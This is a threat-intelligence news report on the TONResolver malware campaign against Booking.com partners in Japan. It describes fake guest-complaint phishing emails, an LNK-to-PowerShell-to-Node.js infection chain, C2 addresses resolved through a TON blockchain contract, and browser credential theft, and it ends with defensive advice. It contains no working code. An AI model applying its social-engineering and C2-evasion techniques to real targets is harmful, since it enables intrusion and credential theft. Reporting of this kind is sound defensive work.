TONResolver Malware Targets Booking.com Partners in Japan

Guest complaints usually demand immediate attention from hospitality professionals. Consequently, malicious actors recently exploited this urgency. They targeted Booking.com partners across Japan using deceptive emails. Attackers sent these messages posing as dissatisfied guests. They instructed hotel staff to open attached photographs or complaint documents. Subsequently, this action triggered the sophisticated TONResolver infection chain.
Phishing Tactics and Evasion Strategies
Trend Micro researchers discovered these calculated cyberattacks in late May 2026. Initially, the perpetrators utilized mass phishing campaigns. Furthermore, they employed a highly targeted scheme using Gmail accounts. In the latter scenario, the attacker first sent a benign inquiry without any links. They patiently awaited a response from the hotel employee. Only after establishing trust did they forward the malicious URL. Ultimately, this methodical approach successfully minimized suspicion before delivering the payload.
The Infection Sequence
The malicious compromise began when victims clicked the provided link. This action prompted the download of a deceptive ZIP archive. Inside, attackers concealed an LNK shortcut cleverly disguised as an image file. Upon execution, this shortcut immediately launched a PowerShell command. Then, it downloaded a secondary script and stealthily deployed Node.js. Finally, it executed the JavaScript-based TONResolver malware on the compromised machine.
Decentralized Command and Control
TONResolver features a remarkably unique server management infrastructure. The malware does not hardcode the command server address directly. Instead, it retrieves this vital information through a TON blockchain smart contract. If defenders block the active server, the attackers simply update the contract. Consequently, infected systems automatically redirect their communications to the new address. This decentralized architecture complicates threat analysis significantly. Moreover, it prevents security teams from swiftly severing the malicious connection.
Persistence and Data Exfiltration
Following its initial launch, TONResolver establishes persistence through the Windows startup folder. It subsequently transmits comprehensive system data. This payload includes the computer name, user details, memory, processor, and MAC address. Afterward, the malware maintains a continuous connection to the command server, pinging it every twenty seconds. This initial execution did not instantly trigger file theft. However, it granted operators the capability to execute remote commands. They could seamlessly download additional payloads and launch PowerShell scripts.
Escalation and Mitigation Strategies
During one observed attack sequence, the malicious Node.js process downloaded an executable file. This specific executable deliberately targeted Google Chrome and Microsoft Edge data directories. These folders store sensitive passwords, cookies, browsing history, and bookmarks. Therefore, security experts firmly linked this activity to concerted credential theft attempts.
To mitigate these severe risks, organizations should implement strict access controls. Administrators must restrict workstation access to TON and TonAPI unless strictly necessary. Additionally, security teams should actively filter external PowerShell connections. They must monitor for any suspicious Node.js execution originating from user directories. Finally, companies partnering with Booking.com must thoroughly review their incident response procedures.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.